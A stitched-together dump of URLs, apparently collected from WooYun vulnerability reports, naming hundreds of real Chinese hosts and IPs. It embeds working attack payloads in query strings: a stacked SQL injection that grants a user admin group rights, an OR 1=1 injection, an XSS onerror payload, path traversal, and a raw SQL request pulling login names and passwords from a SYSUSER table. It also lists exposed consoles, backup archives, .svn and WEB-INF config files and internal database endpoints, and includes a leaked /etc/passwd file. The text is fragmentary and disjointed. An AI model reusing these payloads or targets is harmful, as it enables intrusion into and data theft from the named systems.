http://www.lrts.me/user/addLike.do?entityId=9758&entityType=2 http://www.hhfdcw.com/html/news/201506/task-373.html index.php/article/search http://www.hhfdcw.com/index.php/article http://wei.tixaapp.com/index.php?g=Admin&m=Admin&a=index http://27.115.51.166/script http://jinrilicai.cn/newsshow.asp?id=1680 http://3g.sunlands.com/ http://3g.sunlands.com/cas/showForgetPage.action http://61.168.11.25:7080/Monopoly/monopoly/index.html?chl=14 http://tieba.baidu.com/p/3794006612 http://ku.cetools.cn/designer.asp?did=@@version https://cloud.zzidc.com/ch_config ftp://www.sxly.com.cn/ http://open.haodai.com/list/index.html?city=beijing&dkje=5&dklx=%e8%af%b7%e9%80%89%e6%8b%a9&dkqx=12 http://www.lrts.me/update/integral.do display:none!important;display:block;width=0;height=0 display:none!important;display:block;width=0;height=0 display:none!important;display:block;width=0;height=0 display:none!important;display:block;width=0;height=0 display:none!important;display:block;width=0;height=0 http://www.huanrong2010.com/扫描后发现开放了好多端口,一个一个看,在82端口发现了一个好玩的东西 http://www.to8to.com/my/order_info.php?order_no=678440000054 http://www.wanda-cti.com/index.php?m=content&c=index&a=lists&catid=127 http://60.10.8.227:88//wui/common/page/sysRemind.jsp?labelid=2&browserOS=a430d%3Cimg%20src%3da%20onerror%3dconfirm%2811111%29%3Edaa74 http://**.**.**/www/index.php_ http://**.**.**/www/index.php_ http://**.**.**/www/index.php_ www.mdaxue.com http://about.richinfo.cn/ http://121.15.167.239:9000/invoker/EJBInvokerServlet http://121.15.167.239:9000/pm/LoginAction.do http://121.15.167.239:9000/jmx-console/ http://www.hbfgw.gov.cn:84/gw/admin/index.html http://hangjia.com/policy/policydetail/96189385619644526.html http://oa.ldjt.com.cn/login/Login.jsp?logintype=1 http://oa.ldjt.com.cn/tools/SWFUpload/upload.jsp http://oa.ldjt.com.cn/weaver/weaver.email.FileDownloadLocation?fileid=221&download=1 http://shop.pcjoy.cn/gamedetails.aspx?lid=10007&tid=1&sid=136 http://wooyun.org/bugs/wooyun-2010-0108853 http://wooyun.org/bugs/wooyun-2010-0114237 http://ci.kaikeba.com/ http://*.*.*.*/XXXXXX http://api.bilibili.com/search_recommend?_device=android&_hwid=3029927d46659793&_ulv=5000&access_key=76b5b9bdfe34bb8e2a809ba718ac5c6e&appkey=c1b107428d337928&main_ver=v2&platform=android&playtag=2634430&recommend_type=related_post&rindex=1&sign=8ec7f03f380c8a0e289698cb4e75985f http://sqlmap.org http://m.qu.cn/login.php http://baozouribao.com/admin/ http://user.chinaiiss.com/index.php?do=space&uid=999692 http://pinyin.sogou.com/zt/acgn/pc/ajax_post.php http://www.caohua.com/zoning/zo_ga_list?ga_id=1 http://portal.hnust.edu.cn http://t.jzt.58.com/thirdparty/v20/order/orderlist?comm_pf=&refer=1 http://psms.emersonnetwork.com.cn:8000/jsp/admin/login.jsp http://www.qhgrain.gov.cn/admin/webedit/admin_login.asp http://**.**.**.**/Frm/StatPoint.aspx http://**.**.**.**:8085/admin/systems/SetDataWindowStyle.aspx?dwname=1 http://**.**.**.**/admin/systems/SetDataWindowStyle.aspx?dwname=1 http://**.**.**.**/admin/systems/SetDataWindowStyle.aspx?dwname=1 http://fi.amac.org.cn/csrcforsale/user!getZhuanHuList.action http://silang.cn:8000/Login.asp http://www.gxjdgyxx.com:8000/App_Public/Login.aspx?ReturnUrl=%2fDefault.aspx http://www.gxjdgyxx.com:9000/FileUpload/WorkFlow/test/20158/aspx_3.aspx http://ume1.umetrip.com/UmeAd/user/suggest.do?rcid=57208487 http://www.broadtech.hk/eagleshop/shop/ShopTop.aspx http://221.176.66.92:8030/wlan/loginAction!login.action http://221.176.66.92:8030/jsp/top.jsp http://bbs.rh.xunlei.com/ http://bus.jmmr.com/index.asp http://wooyun.org/bugs/wooyun-2010-04477 http://www.brtxm.com:8888/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1%27%29;declare%20@t%20nvarchar%2840%29%20select%20@t=%28select%20top%201%20name%20from%20sysobjects%20where%20name%20like%27%_users%27%20and%20xtype=%27U%27%29%20exec%28%27update%20%27%2b@t%2b%27%20set%20groupid=1%20where%20username=%27%27qwezxcasd%27%27%27%29-- http://shandongbi.wancaitong.com/ http://218.202.0.172/ynscm/login.html http://www4.pconline.com.cn/extmail/cgi/index.cgi?__mode=show_login&error=badlogin http://www.ys7.com/member-receiver.html http://play6.pconline.com.cn/oc/login.jsp http://bbs.pconline.cn/admin/ http://bbs.pconline.cn/admin/forum.jsp https://www.bbpay.com/cgi-bin/flop https://www.bbpay.com/cgi-bin/flopway?mold=0 https://www.bbpay.com/cgi-bin/flop-semail www.i9huan.com www.i9huan.com http://sqlmap.org http://jq.shanghai12301.com/lyj/ http://www.scxj.org/search.php?keyword=1 http://oa.meizu.com/seeyon/index.jsp http://oa.meizu.com//seeyon/logs/ctp.log http://oa.meizu.com//seeyon/logs/uc.log http://xhd.iyiyun.com/xhd.tar.gz http://oa.pc.com.cn/login.do?st=-1 http://epaper.subaonet.com/ http://www.cl.yn.gov.cn/show.aspx?cid=46&id=5471 http://www.gdfc.org.cn/jk_ph_dj.jsp?subject_id=200 http://12333.ttrc.gov.cn:8088/cjwt/wsfw_cjwt_detail.jsp?id= http://www.hbcz.gov.cn:8080/arkcms/guestbook/index.jspsite=/home&siteID=8a8080820b78cd84010b79331b92001e&ID=661401 http://www.hbcz.gov.cn:8080/arkcms/lanmu/artlist.jspLM_ID=402880810c843f9c010c84e611fa0004&LM_ML=/home/lm0/lm00 http://www.hbcz.gov.cn:7001/XZQHQueryWAR/xxcx/zzjb-js_new.jsp?type=a&code=420000 http://www.hbcz.gov.cn:8080/arkcms/guestbook/index.jsp?site=/home&siteID=8a8080820b78cd84010b79331b92001e&ID=661401 http://service.taxchina.com/wcm/outsite/answer/site/ShowList.aspxtypeId=&voId=&partner=0&isChief=&isAnswer=0&condition=no&search= http://user.taxchina.com/wcm/outsite/answer/site/ShowList.aspx?typeId=&voId=&partner=&isChief=&isAnswer=&condition=&search= htts://www.v2ex.com/reset/ http://yuanchuang.10jqka.com.cn/20150731/c579165938.shtml http://user.91160.com/account/sendBindEmail.html https://122.156.42.163/function/ssh/file_ssh.php https://122.156.42.163/function/ssh/file_ssh_exec.php?action=user_query&id=2 http://vcc.siat.ac.cn/index/info?title_id=455 http://vcc.siat.ac.cn/index/getInfo?title_id=455 http://vcc.siat.ac.cn/index/info?lan=true&to_path=research&title_id=453 http://vcc.siat.ac.cn/index/info?to_path=research&title_id=453 http://vcc.siat.ac.cn/index/videoList?title_id=453 http://vcc.siat.ac.cn/index/album?title_id=451 http://vcc.siat.ac.cn/index/member?title_id=452&sub_title=460 http://vcc.siat.ac.cn/index/photo?title_id=451&sub_title=459&album_id=102 http://vcc.siat.ac.cn/index/info?title_id=457 http://nmcqjy.com/nmcqjy.rar http://211.155.87.208/redmine/ inurl:/opac/search.php,影响范围很大 http://120.195.143.181:9090/opac/book_rank.php?cls_no=Q http://lib.math.ac.cn:8080/opac/book_rank.php?cls_no=S http://210.38.120.140:8080/opac/book_rank.php?cls_no=S http://opac.qdgw.edu.cn/opac/book_rank.php?cls_no=S http://ftp.lib.bit.edu.cn/opac/book_rank.php?cls_no=S http://ico.bit.edu.cn/opac/book_rank.php?cls_no=Q http://211.68.0.11/opac/book_rank.php?cls_no=Q http://222.206.220.81/opac/book_rank.php?cls_no=Q www.joycp.net)以服务中国彩票行业为己任,致力于为我国数亿彩票用户群体提供丰富多彩、种类全面、安全可靠的电话及手机购彩服务。 http://www.joycp.com/Interface/CMS/GetCmsNanGe.ashx?lNa http://gzzp.gzzypx.net/guestbook/post.php?edit=true&p_id=48203 http://gzzp.gzzypx.net/Index/hotline?uin=2270963967&name=%E7%BB%BC%E5%90%88%E4%B8%9A%E5%8A%A1 http://gzzp.gzzypx.net/Index/artview?id=16485 http://95555.cmbchina.com http://app.cmbchina.com http://bank4bank.cmbchina.com http://zy.imau.edu.cn/xcbm/rsc/admin/login.asp http://zy.imau.edu.cn/xcbm/xsc/admin/index.asp http://www.zfxindai.cn/.svn/entries http://www.zfxindai.cn/sql/zfnew_copy-2015-4-1.sql http://www.zfxindai.cn/sql/zfnew_data.sql http://amc.sina.com.cn/WEB-INF/classes/application.properties http://amc.sina.com.cn/WEB-INF/classes/applicationContext.xml http://amc.sina.com.cn/WEB-INF/web.xml http://www.chinaunicom.com.cn/city/fujian/tscp/file23.html处,福建分区特色产品中看到url:WWW.10109123.COM/life http://www.10109123.com/index.php/main/forgetpwd http://www.10109123.com/index.php/main/forgetpwd http://www.yunyiba.com/system/plugin/bom/bom.plugin.php?dir=../../..//system/modules http://www.weizhonggou.com/system/plugin/bom/bom.plugin.php?dir=../../..//system/modules http://www.yyyg.com/system/plugin/bom/bom.plugin.php?dir=../../..//system/modules http://www.xia1027.com/system/plugin/bom/bom.plugin.php?dir=../../..//system/modules http://www.1yhlg.com/system/plugin/bom/bom.plugin.php?dir=../../..//system/modules http://www.1ybye.com/system/plugin/bom/bom.plugin.php?dir=../..//../ http://www.ykuaimai.com/system/plugin/bom/bom.plugin.php?dir=../..//.../ http://qccc.china.com.cn/InfoList2/DetailInfo?id=1825 http://qccc.china.com.cn/InfoList2/DetailInfo?id=1825 http://www.gogo.cn/share/13620 http://webappadmin.byd.com.cn/byd/appinfo/android.do www.yunzao.cn,yunzao,yunzao.cn,root,test http://ddpas.dandong.gov.cn/admin/login.jsp http://www.xin.com/ http://ci.culiu.org:8088/ http://112.124.16.207:8888/ http://www.wsfgj.gov.cn/ws_web/newlist.aspx?typeid=03 http://www.wsfgj.gov.cn/ws_web/newshow.aspx?id=390&typeid=13 http://mail.sinopharm.com/ VPN:https://vpn.sinopharm.com http://219.148.178.42/web/device/login?lang=1 https://fj.9you.com/login.php http://scm.sgcs.com.cn/manager/loginAjax/loginJson_login.action http://114.247.129.12/ulp/ graphic:false http://www.nmgfic.com/web.rar http://221.226.149.17:8080/kingdee/custom/add_view_case.jsp?type=1&flag=1 http://221.226.149.17:8080/kingdee/custom/del_view_case.jsp?table_id=1 http://221.226.149.17:8080/kingdee/custom/table_view_case_modify.jsp?dbid=1&selid=1 http://221.226.149.17:8080/kingdee/custom/view_display.jsp?table_id=1&search_case=1 http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://122.139.60.103:800/kingdee/login/loginpage.jsp http://oa.guanhao.com:8080/kingdee/login/loginpage.jsp http://222.179.238.182:8082/kingdee/login/loginpage2.jsp http://222.134.77.23:8080/kingdee/login/loginpage.jsp http://221.4.245.218:8080/kingdee/login/loginpage.jsp http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://220.189.244.202:8080/kingdee/login/loginpage.jsp http://222.133.44.10:8080/kingdee/login/loginpage.jsp http://223.95.183.6:8080/kingdee/login/loginpage.jsp http://61.190.20.51/kingdee/login/loginpage.jsp http://60.194.110.187/kingdee/login/loginpage.jsp http://oa.roen.cn/kingdee/login/loginpage.jsp http://www.eoffcn.com/bkzt/tszz/sqlogin.php http://kdued.kingdee.com/phpmyadmin/index.php http://www.tucao.cc/index.php?m=search&c=index&a=init2&catid=24&time=all&order=inputtime&username=&tag=&q=十万个冷笑话&page=0 http://www.cqjkq.gov.cn/list3.php?maxcid=4&cid=59 https://trade.zjfae.com/zhmm/step1.htm http://222.243.162.35/Article/DetailsView.aspx?id=85 http://222.243.162.35/Article/DetailsView.aspx?id=83 http://www.ejiayu.com/web_adm/ http://shop.ejiayu.com/bak/ http://goto.hupu.com/?a=goclick&id=10511 http://babyrecord.mama.cn/index.php?action=AdminLogin http://bhvpn.buaa.edu.cn/ http://**.**.**.**:9080/zdwz/wms/jsp/user_list.jsp http://**.**.**.**:9080/zdwz/wms/login.jsp http://sinoprobe.cags.ac.cn/VideoDetail.aspx?v_id=74 http://sinoprobe.cags.ac.cn/art_show.aspx?id=42 http://sinoprobe.cags.ac.cn/ScienceAri2.aspx?Eathid=1 http://sinoprobe.cags.ac.cn/admin/ManageLogin.aspx http://edu.cags.ac.cn/category.php?cid=60 http://edu.cags.ac.cn/content.php?aid=658 http://edu.cags.ac.cn/teachercontent.php?iid=487 http://sinoprobe.cags.ac.cn/sinoprobe.rar http://www.colasoft.com.cn/products/phras.php http://www.gogo.cn/m http://www.gogo.cn/home/feed/25937 http://doc.culiu.org http://ea.101.com/ http://report.ztgame.com/web.zip http://report.ztgame.com/.svn/entries https://report.ztgame.com/server/index.php https://report.ztgame.com/server/index.php http://www.quanjing.com/forgetpwd/step1.aspx www.chcei.org/list_news.php?news_id=1409 http://news.sogou.com http://www.leshan.gov.cn/admin/Default.aspx http://m.14271047094704.gw.1688.com/companyinfo.htm?spm=0.0.0.0.M0raBs http://wooyun.org/bugs/wooyun-2010-0113256 http://211.151.3.11/lms/index.php?s=Index/Index/login http://jf.ztgame.com:80/ http://www.xw.gov.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://www.xw.gov.cn/api.php?op=phpsso&code=46bbVFNRAQIAAwkGVVADClIAWQABUgFUB1BZB1JSU00NX1dZEBhfXl9UUFhDRl5cWBNBA1dQERAACF1XQhMBGQJCVglLElReVVBNFgZcQlYRHEtLFVdWDQYFTBweQFVVAVNNREsSVF5VUE0WTWBydCB3NUJdXUoX index.php/Not/index.html?condition=&name=asdfdf http://118.194.236.11:8084/user.action root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin saslauth:x:498:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin qpidd:x:497:496:Owner Daemons:/var/lib/qpidd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin pulse:x:496:494:PulseAudio Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin mcoam:x:500:500::/home/mcoam:/bin/bash mysql:x:501:501::/home/mysql:/bin/bash tss:x:59:59:Account daemon:/dev/null:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin https://mail.cdrcb.com/owa/ https://116.228.131.218/pos/ http://www.flyertea.com/forum.php?mod=viewthread&tid=421376&page=1#pid7041508 http://cofcoc.com/中粮食博会的网站 http://www.sinochemoil.com/esbclient/layout/Export.php存在 http://www.sdwscgs.com:9080/zdwz/cityurl.do?type=toselectall&bj=2 http://www.sdwscgs.com:9080/zdwz/cityurl.do?type=toselectall&bj=1 http://www.wochacha.com:80/ www.wochacha.com http://119.6.100.172:8080/dlp/userReg/pushSetup.do?setupName=asdasd http://gitlab.aimeizhuyi.com/zhaoming/search_build_index/blob/master/src/config/config.php http://gitlab.aimeizhuyi.com/zhaoming/search_build_index/blob/master/src/config.online/config.php http://www.chinartc.com/ http://**.**.**.**/module/newzwgk/getmainById.action?websiteid=911 http://**.**.**.**/module/newzwgk/getmainById.action?websiteid=970 http://**.**.**.**/module/newzwgk/getmainById.action?websiteid=1036&name=%D6%EA%D4%CB%BC%AF%CD%C5 http://**.**.**.**/module/newzwgk/getmainById.action?websiteid=994&name=%B8%BE%D3%D7%B1%A3%BD%A1%D4%BA http://**.**.**.**/module/newzwgk/getmainById.action?websiteid=954&name=%B9%FA%D7%CA%B9%AB%CB%BE http://**.**.**.**/module/newzwgk/getmainById.action?websiteid=956&name=%B5%B5%B0%B8%BE%D6 http://**.**.**.**/module/newzwgk/getmainById.action?websiteid=943 http://**.**.**.**/module/newzwgk/getmainById.action?websiteid=990&name=%B5%E7%C1%A6%B9%AB%CB%BE http://**.**.**.**/module/newzwgk/getmainById.action?websiteid=979&name=%C8%FD%BA%D3%D5%F2 http://**.**.**.**/module/newzwgk/getmainById.action?websiteid=1004&name=%BD%BB%BE%AF%B4%F3%B6%D3 http://**.**.**.**/module/newzwgk/getmainById.action?websiteid=994&name=%B8%BE%D3%D7%B1%A3%BD%A1%D4%BA http://**.**.**.**/module/newzwgk/viewZwxxQianMore.action?websiteid=911&xxfl=0103&pagenum=1&biaotiname=%D5%FE%B8%AE%D0%C5%CF%A2%B9%AB%BF%AA%D6%C6%B6%C8 http://**.**.**.**/module/newzwgk/viewZwxxQianMore.action?websiteid=970&xxfl=0201&pagenum=1&biaotiname=%B5%D8%C7%F8%A3%A8%D0%D0%D2%B5%A3%A9%BD%E9%C9%DC http://**.**.**.**/module/newzwgk/viewZwxxQianMore.action?websiteid=1036&xxfl=0102&pagenum=1&biaotiname=%D5%FE%B8%AE%D0%C5%CF%A2%B9%AB%BF%AA%C4%BF%C2%BC http://**.**.**.**/module/newzwgk/viewZwxxQianMore.action?websiteid=994&xxfl=0105&pagenum=1&biaotiname=%BB%FA%B9%B9%BD%E9%C9%DC http://**.**.**.**/module/newzwgk/viewZwxxQianMore.action?websiteid=954&xxfl=0109&pagenum=1&biaotiname=%D5%FE%B8%AE%D0%C5%CF%A2%C6%E4%CB%FC%C4%DA%C8%DD http://**.**.**.**/module/newzwgk/viewZwxxQianMore.action?websiteid=994&xxfl=0108&pagenum=1&biaotiname=%C4%DA%C9%E8%BB%FA%B9%B9%BC%B0%D6%B0%D4%F0 http://**.**.**.**/module/newzwgk/viewZwxxQianMore.action?websiteid=1004&xxfl=0108&pagenum=1&biaotiname=%C4%DA%C9%E8%BB%FA%B9%B9%BC%B0%D6%B0%D4%F0 http://**.**.**.**/module/newzwgk/viewZwxxQianMore.action?websiteid=979&xxfl=0106&pagenum=1&biaotiname=%BB%FA%B9%B9%D6%B0%C4%DC http://**.**.**.**/module/newzwgk/viewZwxxRightZi.action?websiteid=1019 http://**.**.**.**/module/newzwgk/viewZwxxRightZi.action?websiteid=1019 http://**.**.**.**/module/newzwgk/viewZwxxRightZi.action?websiteid=1019 http://**.**.**.**/module/newzwgk/viewZwxxRightZi.action?websiteid=1019 http://**.**.**.**/module/newzwgk/viewZwxxRightZi.action?websiteid=1019 http://**.**.**.**/module/newzwgk/viewZwxxRightZi.action?websiteid=1019 http://**.**.**.**/module/newzwgk/viewZwxxRightZi.action?websiteid=1019 http://**.**.**.**/module/newzwgk/viewZwxxRightZi.action?websiteid=1019 http://**.**.**.**/module/newzwgk/viewZwxxRightZi.action?websiteid=1019 http://**.**.**.**/module/newzwgk/viewZwxxRightZi.action?websiteid=1019 http://**.**.**.**/module/newzwgk/viewZwxxRightZi.action?websiteid=1019 http://**.**.**.**/main/video/videoList.jsp?subjectid=10151 http://**.**.**.**/main/video/videoList.jsp?subjectid=10151 http://**.**.**.**/main/video/videoList.jsp?subjectid=10151 http://**.**.**.**/main/video/videoList.jsp?subjectid=10151 http://**.**.**.**/main/video/videoList.jsp?subjectid=10151 http://**.**.**.**/main/video/videoList.jsp?subjectid=10151 http://**.**.**.**/main/video/videoList.jsp?subjectid=10151 http://**.**.**.**/main/video/videoList.jsp?subjectid=10151 http://**.**.**.**/main/video/videoList.jsp?subjectid=10151 http://**.**.**.**/main/video/videoList.jsp?subjectid=10151 http://cndms.ztems.com/p49a3_try_web/faq/AllFAQ.aspx http://125.88.171.20/FrameAction/index.do http://yfpt.csc.com.cn:8080/km/ site:yfpt.csc.com.cn http://yfpt.csc.com.cn:8080/km/listRight.dhtml http://yfpt.csc.com.cn:8080/km/report/viewReport.dhtml?reportId=4b90f843-6c11-4a00-b30c-9f8da12bfbb6&reportTypeId=1503%27 http://www.capchem.com/hr/1 www.jiankongbao.com http://www.lurongdai.com http://wooyun.org/bugs/wooyun-2015-0131253 http://spark.m.xunlei.com:8080/login.html http://pai.xunlei.com:8080/login.html http://**.**.**.**/extWeb/i.do cn:8383 http://mls.iwjw.com/houseTask/agent/showTask?taskId=440000 http://uumconsole.iwjwagent.com/)就很简单了,1000个账号,放到burp跑一下,近30个账号密码为123456 http://math.sysu.edu.cn/main/TeachersForce/TeaList.aspx?duty=1 ldap://124.172.223.236:389 http://m.bk.17173.com/question/detail?askid=1003296&classid=1009568&from=mobile http://220.169.61.143/console/ http://220.169.61.143/system/warning.jsp jdbc:sqlserver://172.16.96.34:1433 http://open.haodai.com:80/ http://film.unikaixin.com/customer/exchange_explain.do http://film.unikaixin.com/cmd.jsp http://221.237.153.40:8081/ http://221.237.153.40:8081 http://url/lan/admin_getLisence http://www.ycjsy.com/tb/show.asp?id=20478 http://www.huaop2p.com/content.aspx?id=533249066410,如图所示: http://www.huaop2p.com/content.aspx?id=533249066410 http://sqlmap.org www.huaop2p.com http://www.huaop2p.com/content.aspx?id=533249066410 http://www.huaop2p.com/content.aspx?id=533249066410 http://huiyi.csdn.net/m/ticket/personal/detail?orderid=2014022709773 http://huiyi.csdn.net/m/ticket/personal/detail?orderid=2014050845082 http://huiyi.csdn.net/m/ticket/personal/detail?orderid=2014051396900 http://huiyi.csdn.net/m/ticket/personal/detail?orderid=2014042443820 http://huiyi.csdn.net/m/ticket/personal/detail?orderid=2014051332633 http://115.85.207.58:*7*0*0*1/co*ns*ol*e/ http://115.85.207.58:*7*0*0*1/GsyhEntBank http://115.85.207.58:*7*0*0*1/system/warning.jsp jdbc:oracle:thin:@10.3.96.1:1521/orcl http://www.hljpost.com/ycyhbosom/login/index.jsp www.hljpost.com http://10.15.44.72/discuz/forum.php?mod=guide&view=newthread&mobile=2 http://articles.imp3.net/search.php?x=0&y=0&keywords=test http://www.ejbang.com/weixin/demo/tocreatedemocleanorder.do http://**.**.**.**/html/OurService/GroupService/zhengfugonggongfuwu/ http://**.**.**.**/module/2425_2.html http://**.**.**.**:8800/ServiceAction/com.velcro.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER http://**.**.**.**:8082/ServiceAction/com.velcro.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER http://**.**.**.**/ServiceAction/com.velcro.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER http://**.**.**.**:8080/ServiceAction/com.velcro.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER http://**.**.**.**/vmain/login.jsp http://**.**.**.**/ServiceAction/com.velcro.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER%20where%20rownum%3C10 https://116.228.218.6/AuditSec/login?op=logout http://intel.hiall.com.cn/intel.sql http://119.60.5.37:8081/health2/login http://221.226.149.17:8080/kingdee/disk/add_folder.jsp?current_file_id=1&file_name=1 http://221.226.149.17:8080/kingdee/disk/save_file_property.jsp?file_name=1&file_id=1 http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://122.139.60.103:800/kingdee/login/loginpage.jsp http://oa.guanhao.com:8080/kingdee/login/loginpage.jsp http://222.179.238.182:8082/kingdee/login/loginpage2.jsp http://222.134.77.23:8080/kingdee/login/loginpage.jsp http://221.4.245.218:8080/kingdee/login/loginpage.jsp http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://220.189.244.202:8080/kingdee/login/loginpage.jsp http://222.133.44.10:8080/kingdee/login/loginpage.jsp http://223.95.183.6:8080/kingdee/login/loginpage.jsp http://61.190.20.51/kingdee/login/loginpage.jsp http://60.194.110.187/kingdee/login/loginpage.jsp http://oa.roen.cn/kingdee/login/loginpage.jsp http://**.**.**.**/.svn/entries http://**.**.**.**/.svn/entries http://203.187.184.11 http://mall.bydauto.com.cn/index.php/customer/address/new/ http://t.cn/RLqypdb http://**.**.**.**/extmail/cgi/zxadmin.cgi http://kanqiu.hupu.com/april/sample?from=aprilDetail http://kanqiu.hupu.com/april/news?nid=4875875, http://kanqiu.hupu.com/april/news?nid=4875872 http://creative.pptv.com/share/list?cat=0 https://1**.**4.**8.141:4430/cgi-bh/login.cgi http://www.app-echo.com/user/edit http://qiandan.jiaji.com/SignScan/logins.jsp http://wt.jiaji.com http://www.flyertea.com/credit/index.php/Index/index.html?condition=-0&code=1771&name= http://www.taozfu.com/product/index/1?Br http://addon.discuz.com/?@dc_mall.plugin http://**.**.**.**/sys/sysMenu/list.do http://**.**.**.**/consult/consultStudent/studentProfileList.do?schoolDateType=2 http://oa.http://**.**.**.**/sys/sysPositionAuthority/list.do http://**.**.**.**/teach/teachGroup/list.do http://**.**.**.**/market/marketSchool/list.do AddressController.java/*view*/ www.feicuidai.com https://github.com/haolinks/haolinks/blob/master/feicuidai/WEB-INF/classes/config/db/jdbc.properties http://dv.56.com/hongren/?do=AjaxVideoData&order=1 http://171.111.157.177:80/union/search.do?unionName=CasterJs http://219.143.252.178/,存在sql注入漏洞,通过注入可以脱库获取到800多个表的信息,可以获取到大量用户和密码等敏感信息。 http://sis.minshenglife.com/logon/menu.jsp?userCode=null%27%20oR%2011%3D11%20anD%20%271%27%3D%271&Ip=null&nodecode= inurl:index_xxi.asp?cz= http://**.**.**.**:8086/sfxjs_zdzy.asp?lm=%B5%E7%D7%D3%BC%BC%CA%F5%D3%A6%D3%C3%D7%A8%D2%B5&bh=409 http://**.**.**.**/tsims/sfxjs_zdzy.asp?lm=%B5%E7%D7%D3%BC%BC%CA%F5%D3%A6%D3%C3%D7%A8%D2%B5&bh=409 http://**.**.**.**/tsims/sfxjs_zdzy.asp?lm=%B5%E7%D7%D3%BC%BC%CA%F5%D3%A6%D3%C3%D7%A8%D2%B5&bh=409 http://**.**.**.**/tsims/sfxjs_zdzy.asp?lm=%B5%E7%D7%D3%BC%BC%CA%F5%D3%A6%D3%C3%D7%A8%D2%B5&bh=409 http://**.**.**.**/tsims/sfxjs_zdzy.asp?lm=%B5%E7%D7%D3%BC%BC%CA%F5%D3%A6%D3%C3%D7%A8%D2%B5&bh=409 http://**.**.**.**:8003/sfxjs_NewsShow.asp?lm=%BD%A8%C9%E8%B6%AF%CC%AC&bh=177 http://**.**.**.**:8086/sfxjs_NewsShow.asp?lm=%BD%A8%C9%E8%B6%AF%CC%AC&bh=177 http://**.**.**.**/tsims/sfxjs_NewsShow.asp?lm=%BD%A8%C9%E8%B6%AF%CC%AC&bh=177 http://**.**.**.**/tsims/sfxjs_NewsShow.asp?lm=%BD%A8%C9%E8%B6%AF%CC%AC&bh=177 http://**.**.**.**/tsims/sfxjs_NewsShow.asp?lm=%BD%A8%C9%E8%B6%AF%CC%AC&bh=177 http://**.**.**.**/tsims/sfxjs_NewsShow.asp?lm=%BD%A8%C9%E8%B6%AF%CC%AC&bh=177 http://**.**.**.**/tsims/sfxjs_NewsShow.asp?lm=%BD%A8%C9%E8%B6%AF%CC%AC&bh=177 http://**.**.**.**:8003/sfxjs_xzzqList.asp?lx=%B9%AB%B9%B2%D3%C3%B1%ED&bh=177 http://**.**.**.**:8086/sfxjs_xzzqList.asp?lx=%B9%AB%B9%B2%D3%C3%B1%ED&bh=177 http://**.**.**.**/tsims/sfxjs_xzzqList.asp?lx=%B9%AB%B9%B2%D3%C3%B1%ED&bh=177 http://**.**.**.**/tsims/sfxjs_xzzqList.asp?lx=%B9%AB%B9%B2%D3%C3%B1%ED&bh=177 http://**.**.**.**/tsims/sfxjs_xzzqList.asp?lx=%B9%AB%B9%B2%D3%C3%B1%ED&bh=177 http://**.**.**.**/tsims/sfxjs_xzzqList.asp?lx=%B9%AB%B9%B2%D3%C3%B1%ED&bh=177 http://**.**.**.**/tsims/sfxjs_xzzqList.asp?lx=%B9%AB%B9%B2%D3%C3%B1%ED&bh=177 http://120.204.233.155/index http://pay.lvye.cn/trade/view/351619 https://itunes.apple.com/cn/app/id717831204?mt=8 http://shijue.me/api/accounts/login http://www.dfyl-luxgen.com/index.php/lifehouse index.php/api/searchgetdelaers?time=0.40741090243682265 www.dfyl-luxgen.com http://www.dfyl-luxgen.com http://www.ddianle.com/ http://push.ddianle.com:9876/pushandroid/resources/index.html?cId=7&cnickName=%E5%AE%A2%E6%9C%8D006 http://push.ddianle.com:9876/pushandroid/resources/index.html?cId=7&cnickName=%E5%AE%A2%E6%9C%8D006 http://push.ddianle.com:9876/pushandroid/home.jsp http://push.ddianle.com:9876/pushandroid/resources/index.html?cId=7&cnickName=%E5%AE%A2%E6%9C%8D006 http://hspcn.net:8000/home/Account/ net:8000/home/Account/ValidateLogOn data:usercode=fdsf&password=sfsd http://hb.gjdx.cc/gjdx/signon.shtml http://58.60.230.217:8080/default.html http://58.60.230.217:81/ http://auto.mop.com/tag.jsp?p=1&t=1 http://219.143.252.76/cn/web/user_login.aspx http://user.chinaiiss.com/index.php?do=pm&type=makepm&touid=256427 http://59.41.9.152/siteadmin/ListCompanyInfo.aspx 